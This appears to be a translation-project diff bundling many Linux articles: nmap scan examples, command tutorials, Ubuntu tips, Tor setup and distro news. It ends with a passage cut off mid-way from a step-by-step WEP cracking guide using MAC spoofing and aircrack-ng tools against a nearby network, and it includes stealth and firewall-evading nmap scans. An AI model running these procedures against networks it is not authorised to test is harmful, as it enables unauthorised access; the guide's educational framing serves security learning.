Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:51 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.360 seconds
You have new mail in /var/spool/mail/root
### 25. Scan Remote host for specific ports with TCP ACK ###
[root@server1 ~]# nmap -PA -p 22,80
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:02 EST
Interesting ports on server2.tecmint.com (
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.166 seconds
You have new mail in /var/spool/mail/root
### 26. Scan Remote host for specific ports with TCP Syn ###
[root@server1 ~]# nmap -PS -p 22,80
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:08 EST
Interesting ports on server2.tecmint.com (
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.165 seconds
You have new mail in /var/spool/mail/root
### 27. Perform a stealthy Scan ###
[root@server1 ~]# nmap -sS
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:10 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.383 seconds
You have new mail in /var/spool/mail/root
### 28. Check most commonly used Ports with TCP Syn ###
[root@server1 ~]# nmap -sT
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:12 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.406 seconds
You have new mail in /var/spool/mail/root
### 29. Perform a tcp null scan to fool a firewall ###
[root@server1 ~]# nmap -sN
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 19:01 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
957/tcp open|filtered unknown
3306/tcp open|filtered mysql
8888/tcp open|filtered sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 1.584 seconds
You have new mail in /var/spool/mail/root
That’s it with **NMAP** for now, I’ll be coming up more creative options of **NMAP** in our second part of this serious. Till then, stay tuned with us and don’t forget to share your valuable comments.
via: http://www.tecmint.com/nmap-command-examples/
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@ -1,166 +0,0 @@
translated by coolpigs
Basic Linux Interview Questions and Answers – Part II
Continuing the Interview Series, we are giving 10 Questions here, in this article. These questions and the questions in the future articles doesn’t necessarily means they were asked in any interview. We are presenting you an interactive learning platform through these kind of posts, which surely will be helpful.
Upon the analysis of comments in different forums on last article [11 Basic Linux Interview Questions][1] of this series, it is important to mention here that to bring up a quality article to our readers. We give our time and money, and in return what we expect from you? Nothing. If you can’t praise our work, please don’t demoralize us from your negative comments.
If you find nothing new in a post, don’t forget that for someone it was helpful, and for that he/she was thankful. We can’t make everyone happy in each of our article. Hope you readers would take pain to understand this.
### Q.1: Which command is used to record a user login session in a file? ###
- macro
- read
- script
- record
- sessionrecord
> **Answer** : The ‘script’ command is used to record a user’s login session in a file. Script command can be implemented in a shell script or can directly be used in terminal. Here is an example which records everything between script and exit.
Let’s record the user’s login session with script command as shown.
[root@tecmint ~]# script my-session-record.txt
Script started, file is my-session-record.txt
The content of log file ‘my-session-record.txt’ can be views as:
[root@tecmint ~]# nano my-session-record.txt
script started on Friday 22 November 2013 08:19:01 PM IST
[root@tecmint ~]# ls
^[[0m^[[01;34mBinary^[[0m ^[[01;34mDocuments^[[0m ^[[01;34mMusic^[[0m $
^[[01;34mDesktop^[[0m ^[[01;34mDownloads^[[0m my-session-record.txt ^[[01;34$
### Q.2: The kernel log message can be viewed using which of the following command? ###
- dmesg
- kernel
- ls -i
- uname
- None of the above
> **Answer** : The kernel log message can be viewed by executing 'dmesg' command. In the list kernel is not a valid Linux command, 'ls -i' lists the file with inode within the working directory and 'uname' command shows os.
[root@tecmint ~]# dmesg
Initializing cgroup subsys cpuset
Initializing cgroup subsys cpu
Linux version 2.6.32-279.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Fri Jun 22 10:59:55 UTC 2012
KERNEL supported cpus:
Intel GenuineIntel
AMD AuthenticAMD
NSC Geode by NSC
Cyrix CyrixInstead
Centaur CentaurHauls
Transmeta GenuineTMx86
Transmeta TransmetaCPU
Disabled fast string operations
BIOS-provided physical RAM map:
### Q.3: Which command is used to display the release of Linux Kernel? ###
- uname -v
- uname -r
- uname -m
- uname -n
- uname -o
> **Answer** : The command ‘uname -r’ display the kernel release information. The switch ‘-v’ , ‘-m’ , ‘-n’ , ‘o’ display kernel version, machine hardware name, network node, hostname and operating system, respectively.
[root@tecmint ~]# uname -r
### Q.4: Which command is used to identify the types of file? ###
- type
- info
- file
- which
- ls
> **Answer** : The ‘file’ command is used to identify the types of file. The syntax is ‘file [option] File_name’.
[root@tecmint ~]# file wtop
wtop: POSIX shell script text executable
### Q.5: Which command locate the binary, source and man page of a command? ###
> **Answer** : The ‘whereis’ command comes to rescue here. The ‘whereis’ command locate the binary, source, and manual page files for a command.
[root@tecmint ~]# whereis /usr/bin/ftp
ftp: /usr/bin/ftp /usr/share/man/man1/ftp.1.gz
### Q.6: When a user login, which files are called for user profile, by default?? ###
> **Answer** : The ‘.profile’ and ‘.bashrc’ present under home directory are called for user profile by default.
[root@tecmint ~]# ls -al
-rw-r--r--. 1 tecmint tecmint 176 May 11 2012 .bash_profile
-rw-r--r--. 1 tecmint tecmint 124 May 11 2012 .bashrc
### ###Q.7: The ‘resolve.conf’ file is a configuration file for?
> **Answer** : The ‘/etc/resolve.conf’ is the configuration file for DNS at client side.
[root@tecmint ~]# cat /etc/resolv.conf
### Q.8: Which command is used to create soft link of a file? ###
- ln
- ln -s
- link
- link -soft
- None of the above
> **Answer** : The ‘ln -s’ command is used to create soft link of a file in Linux Environment.
[root@tecmint ~]# ln -s /etc/httpd/conf/httpd.conf httpd.original.conf
### Q.9: The command ‘pwd’ is an alias of command ‘passwd’ in Linux? ###
> **Answer** : No! The command ‘pwd’ is not an alias of command ‘passwd’ by default. ‘pwd’ stands for ‘print working directory’, which shows current directory and ‘passwd is used to change the password of user account in Linux.
[root@tecmint ~]# pwd
[root@tecmint ~]# passwd
Changing password for user root.
New password:
Retype new password:
### Q.10: How will you check pci devices vendor and version on a Linux? ###
> **Answer** : The Linux command ‘lspci’ comes to rescue here.
[root@tecmint ~]# lspci
00:00.0 Host bridge: Intel Corporation 5000P Chipset Memory Controller Hub (rev b1)
00:02.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 2-3 (rev b1)
00:04.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 4-5 (rev b1)
00:06.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 6-7 (rev b1)
00:08.0 System peripheral: Intel Corporation 5000 Series Chipset DMA Engine (rev b1)
That’s all for now. I hope these above questions might be very helpful to you. In our next weekend we again come-up with some new set of questions. Till then stay healthy, tuned and connected to Tecmint.
via: http://www.tecmint.com/basic-linux-interview-questions-and-answers-part-ii/
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sources/Built in Audit Trail Tool – Last Command in Linux.md
Normal file
sources/Built in Audit Trail Tool – Last Command in Linux.md
Normal file
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(whatever1992 ing)
Built in Audit Trail Tool – Last Command in Linux
If you are working as a server administrator, you may understand that you have to protect your server. Not only from the outside, but you have to protect it from the inside. Linux has one built-in command to see who is the last logged in user into your server.
The command is **last**. This command is **very useful for audit trail**. Let’s start to see what can last to do for you.
### What is the function of Last command ###
**Last** display a list of all user logged in (and out) from **/var/log/wtmp** since the file was created. This file is binary file which cannot view by text editor such as Vi, Joe or another else. This trick is pretty smart because user (or root) can not modify the file as they want.
Last gives you information the name of all users logged in, its tty, IP Address (if the user doing a remote connection) date – time, and how long the user logged in.
### How to run Last ###
You just need to type **last** on your console. Here’s the sample :
$ last
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in
reboot system boot 2.6.32-358.23.2 Mon Dec 2 09:20 - 13:25 (04:05)
Here’s how to read last information :
- The first column tell who are the user
- The second column give us information about how the user is connected
> pts/0 (pseudo terminal) means that the user connect via remote connections such as SSH or telnet
> tty (teletypewriter) means that the user connect via direct connection to the computer or local terminal
> Exception for reboot activity the status will be shown is system boot
- The third column **show where the user come from**. If the user connect from remote computer, you will see a hostname or an IP Address. If you see :0.0 or nothing it means that the user is connect via local terminal. Exception for reboot activity, the kernel version will be shown as the status
- The remaining columns display **when the log activity has happened**. Numbers in the bracket tell us how many hours and minutes the connection was happened
### Some examples of Last command on day-to-day operation ###
#### Limit the number of line shown ####
When you have a lot of lines to show, you can limit how many lines do you want to see. Use **-n parameter** to do it.
$ last -n 3
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in
reboot system boot 2.6.32-358.23.2 Mon Dec 2 09:20 - 13:25 (04:05)
**-n parameter** will make last command to display 3 lines starting from the current time and backwards
#### Don’t display the hostname ####
Use **-R parameter** to do is. Here’s the sample :
$ last -R
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in
reboot system boot Mon Dec 2 09:20 - 13:25 (04:05)
As you see, now there is no information about hostname or IP Address
#### Display the hostname in the last column ####
To do this, we can use **-a parameter**
$ last -a
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in :0.0
reboot system boot Mon Dec 2 09:20 - 13:25 (04:05) 2.6.32-358.23.2.el6.i686
Now the hostname information such as will be placed in the last column.
#### Print full login and logout time and dates ####
You can use **-F parameter** for this. Here’s a sample.
$ last -F
leni pts/0 Mon Dec 2 12:32:24 2013 – Mon Dec 2013 13:25:24 2013 (00:53)
#### Print specific user name ####
If you want to trace specific user, you can print it specifically. Put the name of user behind last command.
$ last leni
leni tty1 Mon Dec 2 18-42 still logged in
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
Or if you want to know when **reboot** is done, you can also display it
$ last reboot
reboot system boot Mon Dec 2 09:20 - 16:55 (07:34)
reboot system boot Sun Dec 1 04:26 - 04:27 (00:01)
reboot system boot Wed Nov 27 20:27 - 01:24 (04:57)
reboot system boot Tue Nov 26 21:06 - 06:13 (09:06)
#### Print spesific tty / pts ####
Last can also print information about specific tty / pts. Just put the tty name or pty name behind the last command. Here are some sample outputs :
$ last tty1
pungki tty1 Mon Dec 2 09:31 still logged in
pungki tty1 Mon Dec 2 04:26 – down (00:00)
pungki tty1 Mon Dec 2 04:07 – down (00:00)
pungki tty1 Sun Dec 1 18:55 – 04:07 (09:12)
$ last pts/0
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki pts/0 :0.0 Wed Nov 27 20:28 – down (04:56)
When you see **down value** – such as the second line above – , it means that the user was logged in from specific time until the system is reboot or shutdown.
#### Use another file than /var/log/wtmp ####
By default, last command will parse information from **/var/log/wtmp**. If you want t**he last command** parse from another file, you can use **-f parameter**. For example, you may rotate the log after a certain condition. Let’s say the previous file is named **/var/log/wtmp.1** . Then the last command will be like this.
$ last -f /var/log/wtmp.1
#### Display the run level changes ####
There is **-x parameter** if you want to display run level changes. Here’s a sample output :
pungki tty1 Mon Dec 2 19:21 still logged in
runlevel (to lvl 3) 2.6.32-358.23.2 Mon Dec 2 19:20 – 19:29 (00:08)
reboot system boot 2.6.32-358.23.2 Mon Dec 2 19:20 – 19:29 (00:08)
shutdown system down 2.6.32-358.23.2 Mon Dec 2 18:56 – 19:20 (00:23)
runlevel (to lvl 0) 2.6.32-358.23.2 Mon Dec 2 18:56 – 18:56 (00:00)
leni tty1 Mon Dec 2 18:42 – down (00:00)
You can see that there are two entries of run level. Runlevel which has **to lvl 3** entry means the system is running on full console mode. No active X Window or GUI. Meanwhile, when the system is **shutdown**, Linux us **run level 0**. That’s why last show you **to lvl 0** entry
#### View bad logins ####
While **last** command logs successful logins, then **lastb** command **record failed login attempts**. You **must have root** access to run lastb command. Here’s a sample output from lastb command. Lastb will parse information from /var/log/btmp.
# lastb
leni tty1 Mon Dec 2 22:12 – 22:12 (00:00)
rahma tty1 Mon Dec 2 22:11 – 22:11 (00:00)
#### Rotate the logs ####
Since **/var/log/wtmp** record every single log in activities, the size of the file may grow quickly. By default, Linux will **rotate /var/log/wtmp** every month. The detail of rotation activity is put in /etc/logrotate.conf file. Here’s the content of my **/etc/logrotate.conf** file.
/var/log/wtmp {
create 0664 root umtp
minsize 1M
rotate 1
And for **/var/log/btmp**, here’s default configuration of rotate activity
/var/log/btmp {
create 0600 root umtp
minsize 1M
rotate 1
### Conclusion ###
You can combine those parameters to custom the output of last and lastb. All parameter **which run on last** command, **also run on** lastb command. For more detail, please visit last manual page by typing **man last** on your console.
via: http://linoxide.com/linux-command/linux-last-command/
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@ -1,44 +0,0 @@
Canonical Dev Calls Linux Mint ‘Vulnerable’, Wouldn’t Use it For Online Banking
> Linux Mint has since responded to the comments by Oliver Grawert. [You can read them here][1].
**Users of the popular Ubuntu-based operating system Linux Mint should not use it for online banking, a Canonical [engineer has advised][2].**
Mint’s decision to prevent packages with known security issues from updating – from the kernel and browser to the boot-loader and Xorg display server – leaves its users with a “vulnerable system”, says *Oliver Grawert*.
> “Instead of just integrating changes properly with the packages in the ubuntu archive they instead suppress doing (security) updates at all for them. i would say forcefully keeping a vulnerable kernel browser or xorg in place instead of allowing the provided security updates to be installer makes it a vulnerable system, (sic)”.
> “I personally wouldn’t do online banking with it.”
Grawert certainly isn’t alone in considering Mint a sub-par choice for the security conscious. Mozilla contributor and former Ubuntu member Benjamin **Kerensa* feels the same:**
> “It is unclear why Linux Mint disables all of their security updates. I can say that it took them many months to get a fixed version of Firefox packaged while Ubuntu and Debian had already had security fixes in their package.
> This puts Linux Mint users at risk and is one of the key reasons I never suggest Linux Mint to anyone as an alternative to Ubuntu.”
Oliver Grawert is no fly-by-night contributor. As one of Canonical’s Ubuntu Engineering bods he’s better placed than most to know what he’s talking about.
> ‘But are Mint users in actual risk? Yes and no…’
But are Mint users in actual risk?
Yes and no. The majority of security “holes” (for want of a better word) of the kind present in the packages that Mint’s developers steadfastly refuse to update are both documented and known, but rarely exploited by those of a nefarious breed. As such the “actual threat” posed to users remains, at least for now, largely a theoretical one.
That’s to say that there are no known incidents of identify theft or worse resulting from use of Mint (or any other Ubuntu-based distribution with unpatched packages) through any of the exploits referenced by Grawert on the Ubuntu Dev Mailing List.
But just because no-one has entered through the window left ajar thus far, isn’t to say someone won’t ever do it.
**After seeing Ubuntu given a long and sustained kicking about its own (largely theoretical) privacy issues, it will be interesting to see if, now the boot is placed firmly on the other foot, the vehement concern for users’ wellbeing will extend to other distributions. **
Notice: We reached out to Linux Mint for comment & clarification but received no reply.
via: http://www.omgubuntu.co.uk/2013/11/canonical-dev-dont-use-linux-mint-online-banking-unsecure
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
[1]:这个地址在发布的时候填写成“Linux Mint Respond to Ubuntu Developer’s ‘Vulnerable’ Claim”这篇文章的发布的地址
@ -1,29 +0,0 @@
Canonical and ASUS Have Formed a Partnership in USA
**Canonical and ASUS have formed a partnership that would enable the hardware vendor to equip a couple of its laptops with the Ubuntu operating system.**
ASUS is now providing the X201E and 1015E laptops with Ubuntu preinstalled in an effort to penetrate the education market.
“As Ubuntu, and all the software bundled on it is free, there’s no licence fees in the purchase price which significantly reduces cost. This is perfect for students and institutions, both of whose finances can be hard pressed.”
“Productivity applications are taken care of by LibreOffice. Familiar feeling, they offer all the functionality students and staff need and are fully compatible with existing files from the leading proprietary alternative. There are also bundled free applications for email and web browsing,” reads the official [announcement][1] on Ubuntu’s website.
The two laptops are not exactly powerhouses and are aimed at productivity, and maybe multimedia content. The ASUS 1015E laptop features a Intel Celeron 847 1.1 GHz processor, 2 GB DDR3 Memory, a 320 GB 5400 rpm Hard Drive, and a 10.1-Inch screen.
The other model, which is currently out of stock, ASUS X201E, is a little bit more powerful, but not by much: Intel Celeron 847 (1.1GHz) Sandy Bridge processor, 4 GB DDR3, 320 GB 5400 rpm Hard Drive, an 11.6-Inch screen, and Intel GMA HD graphics solution.
“Beyond the basics thousands of other free, open-source applications are available to meet more specific needs from image processing and 3D animation to anti-virus or accounting.”
“We know that effective personal computing is vital to students and Institutions, so it’s exciting for us to work with our partners to bring these low-cost, high-performance packages into the education sector,” is also stated in the announcement.
Canonical announcement sends to a couple of Amazon pages, but if you’re interested in these products than you should know that they are available in a number of other stores.
via: http://news.softpedia.com/news/Canonical-and-ASUS-Have-Formed-a-Partnership-in-USA-404483.shtml
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Configure Your Browser To Use Tor On Ubuntu/Debian/Linux Mint
**Tor**, **T**he **O**nion **R**outer, is a network of Virtual Tunnels that allows users to communicate securely and as well as anonymously over Internet. Tor allows organizations and individuals to share information over public networks without compromising their privacy. We can use Tor to keep websites from tracking us and also our family members, or to connect to news sites, instant messaging services, or the websites which are blocked by the Internet providers and Network Administrators.
Tor was originally designed, implemented, and deployed as a third-generation [onion routing project of the U.S. Naval Research Laboratory][1]. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others.
In this quick how-to let us learn how to use Tor with our browsers. The steps provided here were tested on Ubuntu 13.04 Desktop, but it should work on all Debian/Ubuntu and its derivatives.
### Install Tor & Vidalia On Ubuntu / Debian / Linux Mint ###
Tor is available in the default repositories of Debian/Ubuntu, but they might be bit outdated. So add Tor repository to your distribution source lists.
Edit file **/etc/apt/sources.list**,
$ sudo nano /etc/apt/sources.list
Add the following lines depending upon your distribution version. As i am testing this on my Ubuntu 13.04 desktop, i added the following lines.
deb http://deb.torproject.org/torproject.org raring main
Save and close the file. If you’re using Ubuntu 13.10, then the lines should be,
deb http://deb.torproject.org/torproject.org saucy main
For Debian 7 Wheezy,
deb http://deb.torproject.org/torproject.org wheezy main
Add the gpg key using following commands:
$ gpg --keyserver keys.gnupg.net --recv 886DDD89
$ gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Update the repository list and install vidalia using commands:
$ sudo apt-get update
$ sudo apt-get install tor vidalia deb.torproject.org-keyring
During installation, you’ll be asked which user should be able to control Tor service. Select the user and click Ok.
Now Vidalia is installed and running.
### Configure Firefox Browser ###
Open your browser. Go to **Edit -> Preferences -> Advanced -> Network ->Settings**. Select manual Proxy Configuration. In the SOCKS Host column, enter **localhost** or **** and in the port column enter **9050** as shown in the below screenshot.
Now point your browser with URL **https://check.torproject.org/**. You will see a green message that indicates: “**Congratulations. This browser is configured to use Tor**”. Red message indicate that Tor is not setup. Refer the following screenshot.
![Are you using Tor? - Mozilla Firefox_014](http://180016988.r.cdn77.net/wp-content/uploads/2013/12/Are-you-using-Tor-Mozilla-Firefox_014.jpg)
The same settings are applicable for all browsers, just open the Browser settings/preferences window, find the Network settings, Enter **** in proxy server column and **9050** in port box. To disable Tor, Select **Use System Proxy settings** on browser settings.
**Note**: If you want to use Tor for anonymous web browsing, please read our article about [Tor Browser Bundle][2]. It comes with readily configured Tor and a browser patched for better anonymity. To use SOCKS directly (for instant messaging, Jabber, IRC, etc), you can point your application directly at Tor (localhost port 9050), but see [this FAQ entry][3] for why this may be dangerous.
That’s it. Good Luck! Stay Safe!
via: http://www.unixmen.com/configure-browser-use-tor-ubuntu-debian-linux-mint/
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Daily Ubuntu Tips – Take Screenshots Of your Desktop
Ubuntu, a powerful and modern operating system allows you to perform many tasks. From creating and editing documents using LibreOffice Productivity Suite to enhancing an image with GIMP, Ubuntu is super!
If you need a super operating system to carry out your tasks, you may want to choose Ubuntu.
Another thing you can do when using Ubuntu is to take screenshots of your desktop and/or active application windows. There are many third-party tools you can install to perform such tasks, but you don’t have to, because Ubuntu comes with one already installed.
This program is useful if you want to show someone how do something in Ubuntu. Screenshots are just normal image files that can stored and send via email programs to others.
To use the screenshots program, go to Dash or press the Windows key on your keyboard to bring up Dash. The Windows key is the key left of the spacebar with Windows logo.
When Dash opens, search for Screenshot, select Screenshot to open it.
Here are some of the screen you can capture:
- You can grab the whole screen
- You can grab the current program windows
- You can select a particular area and grab it
If you wan to include the mouse pointer, check the box next to it and enable it.
When you want to capture a screen, click ‘**Take Screenshot**’. The program will disappear and automatically take a screenshot.
If you want to capture a particular area, choose that option and when you click ‘**Take Screenshot**’, the mouse pointer will change into a crosshair. You can then be drag the curser to desired size. When you stop, the image is captured automatically.
This is how you do it when you’re using Ubuntu
Hope this helps and please come back again.
via: http://www.liberiangeek.net/2013/12/daily-ubuntu-tips-take-screenshots-of-your-desktop/
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Daily Ubuntu Tips–Change The Language You Use In Ubuntu
Ubuntu, a modern and powerful operating system also allows you to use your desktop in dozens of other languages. By default, there are few language packs installed when you first setup Ubuntu. If you want Ubuntu to support more languages, you must install additional language packs. Not all languages are support, but most languages that are in used and written are supported. This brief tutorial is going to show you how to make this happen.
After installing a language pack, you can also rename standard folders like music, pictures and documents according to your language. You must log off and log back in for the changes to apply. When you log back in, you’ll prompted and asked if you want to rename these standard folders to match the names for your selected language.
To change which language you use in Ubuntu, click the top right **gear** of the menu bar and select **System Settings**. When the System Settings opens, select **Language Support**.
If prompted to install additional language support, do it. If not, click Install / Remove to install new language packs, then select the language you which to install and install it. Finally, drag the language at the top of the list and save. This change will only apply to your profile. If you which to apply the language settings system-wide, click **Apply System-Wide**.
Drag the new language at the top of the list. When done, click Close.
Close out and log out. Then log back in and enjoy!
Again, changing the language pack will only apply to your profile. If you want it globally, you must click Apply System-Wide.
If you choose to rename standard folders to your native language, you’ll see folders name changed after you sign on.
via: http://www.liberiangeek.net/2013/10/daily-ubuntu-tipschange-the-language-you-use-in-ubuntu/
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GCC 4.9 Is Now In Bug-Fixes-Only Stage 3 Mode
[GCC 4.9][1] with [its many new features][2] is aiming for a release in the first half of 2014. As of this morning the GCC code-base will not accept new features as it's under a big-fixing-only flag.
Richard Biener announced this morning that trunk is now in stage three, so that after eight months of allowing features into GCC for the 4.9 release, nothing new will be permitted unless an exception is granted by the release managers. Stage 3 allows for general bug-fixing work to be completed while in about two months it will go into the Stage 4 mode of only allowing documentation and regression fixes.
At the moment there are 63 P1 regressions (the most severe regression) for GCC 4.9 followed by 136 P2 regressions, 14 P3 regressions, 88 P4 regressions, and 60 P5 regressions. Not until the 63 regressions of the P1 state have been zeroed out will GCC 4.9 move closer to being released. The GCC 4.9.0 release will likely come some time around Q2'2014.
This morning's GCC 4.9.0 status report can be found on the [GCC mailing list][3]. GCC 4.9 will be a very nice compiler update and competition to next month's release of [LLVM 3.4][4].
via: http://www.phoronix.com/scan.php?page=news_item&px=MTUyMjk
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sources/GNOME’s File Manager Will Be More User Friendly.md
Normal file
sources/GNOME’s File Manager Will Be More User Friendly.md
Normal file
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GNOME’s File Manager Will Be More User Friendly
**Allan Day, a GNOME designer, posted a few days ago on his blog a very long article about [what’s coming next in the Nautilus (now known as Files) file manager for the GNOME desktop environment][1].**
What you will read in this article is a short summary of the new design features that will be implemented in upcoming releases of Nautilus, which will be part of the GNOME 3.12 desktop environment.
Apparently, a team of GNOME developers decided to revamp the default file manager of the controversial desktop environment, and bring some of its background functionality to the spotlight, making them obvious to new users.
Believe it or not, there are a lot of new users, those who are trying to discover the wonders of the Linux world, that have no idea what to do in Nautilus, how to copy, paste, rename, move or even access their files… and this is a big and embarrassing problem that needs to be fixed!
Therefore, future versions of the Nautilus file manager will have improved, responsive grids and lists views with big and clear thumbnails, as well as helpful zoom levels, so you can easily recognize your files. An updated View menu, with nicer controls, will also be implemented.
![Nautilus list view](http://i1-news.softpedia-static.com/images/news2/GNOME-s-File-Manager-Will-Be-More-User-Friendly-409360-2.png)
*Nautilus list view*
![Nautilus grid view](http://i1-news.softpedia-static.com/images/news2/GNOME-s-File-Manager-Will-Be-More-User-Friendly-409360-3.png)
*Nautilus grid view*
![Nautilus gear menu](http://i1-news.softpedia-static.com/images/news2/GNOME-s-File-Manager-Will-Be-More-User-Friendly-409360-4.png)
Nautilus gear menu
Another important feature that will be implemented in Nautilus (Files) will be all kind of helpful buttons, such as Copy To, Move To, Create New Folder, or Open With, so it can make file operations more user friendly. Also, previewing files will be more straightforward, including a highly anticipated navigation function, so you can easily browse through multiple photos or documents
Moreover, the sidebar will be more customizable, allowing users to add or remove network drives, partitions or remote connections from it, making it as uncluttered as possible. A “Starred” entry will also be available for all your favorite files, along with an improved content selection function, allowing users to select items from multiple sources.
![Nautilus add drive dialog](http://i1-news.softpedia-static.com/images/news2/GNOME-s-File-Manager-Will-Be-More-User-Friendly-409360-5.png)
*Nautilus add drive dialog*
![Nautilus content selection](http://i1-news.softpedia-static.com/images/news2/GNOME-s-File-Manager-Will-Be-More-User-Friendly-409360-6.png)
*Nautilus content selection*
Unfortunately, there’s no way for us to compile and test the upcoming Nautilus file manager at this moment, but we will let you know when the first development version is out. We remind everyone that Nautilus is also the default file manager for the Ubuntu Linux operating system.
via: http://news.softpedia.com/news/GNOME-s-File-Manager-Will-Be-More-User-Friendly-409360.shtml
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[Translating by SteveArcher]
Gnu: toward the post-scarcity world – the Free Software Column
**It is 30 years since Richard Stallman announced that he was going to write a complete UNIX-compatible software system called GNU, pioneering the idea of free and open source software, but the struggle continues **
@ -36,4 +37,4 @@ via: http://www.linuxuser.co.uk/features/gnu-toward-the-post-scarcity-world-the-
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[翻译中]by stduolc
How to Crack a Wi-Fi Network's WEP Password with BackTrack
You already know that if you want to lock down your Wi-Fi network, you should [opt for WPA encryption][1] because WEP is easy to crack. But did you know how easy? Take a look.
*Note: This post demonstrates how to crack WEP passwords, an older and less often used network security protocol. If the network you want to crack is using the more popular WPA encryption, see our [guide to cracking a Wi-Fi network's WPA password with Reaver][2] instead.*
Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing [how to pick a lock][3] doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise.
Dozens of tutorials on how to crack WEP are already all over the internet using this method. Seriously—Google it. This ain't what you'd call "news." But what is surprising is that someone like me, with minimal networking experience, can get this done with free software and a cheap Wi-Fi adapter. Here's how it goes.
### What You'll Need ###
Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:
- **A compatible wireless adapter**—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter, pictured here, and it set me back about $50 on Amazon. Update: Don't do what I did. Get the [Alfa AWUS036H][4], not the US050NH, instead. [The guy in this video][5] below is using a $12 model he bought on Ebay (and is even [selling his router of choice)][6]. There are [plenty of resources on getting aircrack-compatible adapters out there][7].
- **[A BackTrack Live CD][8]**. We already took you on a [full screenshot tour of how to install and use BackTrack 3][9], the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
- **A nearby WEP-enabled Wi-Fi network**. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.
- **Patience with the command line**. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
### Crack That WEP ###
To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger —mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.
Now it's time to pick your network. Run:
airodump-ng (interface)
To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.
Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.
Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)
Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.
